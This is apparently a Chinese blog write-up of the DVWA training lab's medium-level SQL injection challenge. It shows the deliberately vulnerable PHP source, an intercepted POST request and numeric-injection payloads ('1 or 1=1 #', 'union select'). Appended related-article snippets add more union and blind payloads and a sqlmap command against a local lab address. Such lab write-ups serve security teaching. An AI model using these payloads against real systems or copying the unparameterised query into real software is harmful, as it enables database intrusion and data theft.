DVWA-SQL Injection(medium)

最新推荐文章于 2025-05-15 09:40:04 发布
最新推荐文章于 2025-05-15 09:40:04 发布
阅读量759 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wst0717/article/details/102669506

文章目录

medium.php

SQL Injection Source
vulnerabilities/sqli/source/medium.php


<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id); 

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' ); 

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Display values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

} 

// This is used later on in the index.php page 
// Setting it here so we can close the database connection in here like in the rest of the source scripts 
$query  = "SELECT COUNT(*) FROM users;"; 
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); 
$number_of_rows = mysqli_fetch_row( $result )[0]; 

mysqli_close($GLOBALS["___mysqli_ston"]); 
?>

1.medium相对low级别的变化

1)代码中medium相对low级别的变化
 $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

详见:
PHP mysqli_real_escape_string() 函数

2)前端页面中medium相对low级别的变化

页面设置下拉选择表单,对用户的输入作了限制。
在这里插入图片描述

2.漏洞利用

可以通过抓包改参数,提交恶意构造的查询参数。

POST http://127.0.0.1/dvwa/vulnerabilities/sqli/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 18
DNT: 1
Host: 127.0.0.1
Pragma: no-cache
Cookie: security=medium; PHPSESSID=5c77n9pgnrr9u9i6383rko2oh6

id=1&Submit=Submit
1)判断注入类型

抓包更改参数id为1′ or 1=1 #
在这里插入图片描述
抓包更改参数id为1 or 1=1 #
在这里插入图片描述存在数字型注入。
因为数字型注入不需要借助引号,所以mysql_real_escape_string函数的设置对注入对我们要进行的注入操作无限制。

2)猜解字段

在这里插入图片描述在这里插入图片描述
得出结论:
字段数2个,即First name、Surname

3)确定显示的字段顺序

更改参数id为1 union select 1,2 #
在这里插入图片描述
sql查询语句:select First name,Surname from 表 where ID=id…

DVWA SQL Injection Medium
Ramona的博客
11-27 526
Mdeium 基本的步骤及知识点在上节已经提到过这里不再赘述:https://blog.youkuaiyun.com/WQ_BCJ/article/details/84554777 1)与low级别不同,本次采用的是下拉按钮的方式,限制了用户的输入,通过url可以发现并没有?id=.....类似的参数所以不是get方法,那么我们可以通过火狐的hackbar提交post数据试一试: 2)通过以上页...
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 336
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
最新发布
mooyuan的网络安全博客
05-15 817
DVWA(Damn Vulnerable Web Application)中的 SQL Injection 关卡是用于练习和演示 SQL 注入攻击的不同场景,不同安全等级存在不同的脆弱点和绕过方法,本小节对低等级别的关卡进行渗透实战。
DVWA sql injection medium
weixin_43345082的博客
06-12 367
我们发现是post型注入 于是用hackbar进行注入 按照low的注入顺序,先爆库 Submit=Submit&id=1’ union select 1,database()# 这里居然会报错,仔细看错误,发现莫名其妙多出‘\’看源码 百度一下这个函数 将非法字符转义了,那么我们避免输入这些字符就好了 于是构造 Submit=Submit&id=1 union select...
DVWA sql注入-MEDIUM
m0_46616663的博客
05-25 592
1.判断是否存在sql注入漏洞 可以看到不是get型数据提交方式了,查询数据也变成了下拉表单的方式。 burpsuite抓包吧那就 常规判断有无注入及其类型 推测有转义符转义 为数字型注入 数据库字段为2 获取数据库信息 1'union select version(),@@version_compile_os# 查询用户名和数据库名 1 union select database(),user()# 爆表...
DVWA sql注入 (Medium
gclome的博客
07-05 3606
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
DVWA--SQL注入(SQL Injection)--Medium
JakeLin's Blog
06-16 955
DVWA--SQL注入(SQL Injection)--Low 目录 级别:Medium 1、查看POST请求 2、hackbar提交POST请求 3、输入',报错,判断为数字型注入 4、猜测SQL查询的字段数 5、确定回显的位置 6、获取当前数据库及版本信息 7、获取数据库中表信息(group_concat()) 8、获取表字段 9、获取用户信息 10、密文解码 后台源码 级别:Medium Medium级别的代码利用mysql_real_escape_string函数对特.
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3121
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1758
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 702
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWAsql注入( SQL Injection
qq_54537919的博客
06-25 868
DVWAsql注入( SQL Injection)全等级low、medium、high
DVWA-1.0.7
01-31
学习PHP漏洞挖掘大基友门有福了!希望大家能够使用这个平台能在漏洞挖掘方面有一定提升.
【网络安全】DVWASQL注入—medium level解题详析
热门推荐
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行转义处理,以防止 SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
DVWA SQL注入(medium
fqefeq的博客
03-12 1489
若将ID值改为1’and ‘1’ =’1(或1’and 1 =1#),正常返回;改为1’ and’1’=’2(或1’and 1=2#),不正常返回,则证明其为字符型注入(一般用#方法)后台语句:select Firstname,Surname from users where id=1 union select 1,2#若将ID值改为1 and 1 =1,正常返回;改为1 and 1=2,不正常返回,则证明其为数字型注入。输入1 union select 1,2#1 order by 2# 结果:正常。
DVWA SQL注入(Medium)
qq_61975388的博客
08-18 548
在我们调整安全级别为Medium之后SQL注入变成了如下页面我们发现用户不可以自由输入内容了,那我们就只好通过修改数据包的方式来拼接命令。
DVWA靶场之SQL注入通关详解,2024年网络安全进阶者的新篇章
m0_61068088的博客
04-05 1082
判断存在SQL注入后,接下来通过order by语句来猜解字段数。当在输入框中输入1’order by 3#时,页面出现不一样的界面,因此这里的字段数有两个。接下来,再通过union select来确定回显位置。如下图所示,回显位置为第二个。获取当前数据库(union select 1,database()),可以得到数据库为dvwa
大白话之从零讲解DVWA()-SQL注入(SQL Injection) Medium/High Level
_Adler.
03-22 259
https://www.stackoverflow.wiki/blog/articles/2019/03/22/1553218661938.html
DVWA - SQL Injection (low, medium, high)
无节操
01-06 2746
low查看源码,可发现是注入点id为字符类型,无验证,直接上:' union select first_name, password from users#返回结果如下:ID: ' union select first_name, password from users# First name: admin Surname: e2075474294983e013ee4dd2201c7a73 ID:
dvwa sql medium实验(包括burpsuite的配置和问题解决)
weixin_43749051的博客
03-07 655
本次尝试的是dvwasql medium的试验。 首先用到的软件是 burp suite. 需要配置的如下: https://www.cnblogs.com/0pen1/p/12272642.html?utm_source=tuicool 如果burpsuite还没有抓取到报文,那么尝试: https://www.freesion.com/article/7450213044/ 虽然使用了下拉选择菜单,但是我们可以通过抓包修改参数,实现SQL注入; 借助Burp Suite工具对抓取的数据包进行输入:
dvwa靶场sql盲注medium级别
12-28
### DVWA SQL Blind Injection Medium Level Attack Method Tutorial In the context of DVWA (Damn Vulnerable Web Application), exploiting a SQL blind injection vulnerability at the medium difficulty level involves understanding how to interact with the application and craft specific payloads that can infer database structure or content based on true/false responses. The command provided serves as an example payload used within such attacks, specifically designed to retrieve table names from the current database schema by leveraging conditional logic in queries: ```sql select table_name from information_schema.tables where table_schema=database()[^1] ``` For executing this type of attack against DVWA's SQLi Blind challenge set to 'Medium', one approach is using automated tools like SqlMap which simplifies the process significantly. An invocation might look similar to what has been shared previously: ```bash py3 sqlmap.py -u "http://192.168.123.20/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=248dmjg65dksvfvf8kk0k7vqj0; security=low" --current-db[^2] ``` This tool automates much of the work involved in detecting vulnerabilities, extracting data through time-based boolean conditions without direct output feedback, and even taking over databases under certain circumstances—all while adhering to user-defined constraints regarding legality and ethics. When performing manual exploitation for educational purposes only, consider crafting custom scripts or modifying existing ones according to your environment setup. The key lies in constructing queries that cause different behaviors depending on whether they evaluate to true or false, allowing inference about underlying structures indirectly via side-channel observations. --related questions-- 1. How does changing the security level affect the effectiveness of SQL injection techniques? 2. What are some common defenses implemented against SQL injections? 3. Can you explain more about Information Schema Tables and their role in discovering database objects during penetration testing? 4. Are there any particular challenges associated with exploiting blind SQL injections compared to error-based methods?
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值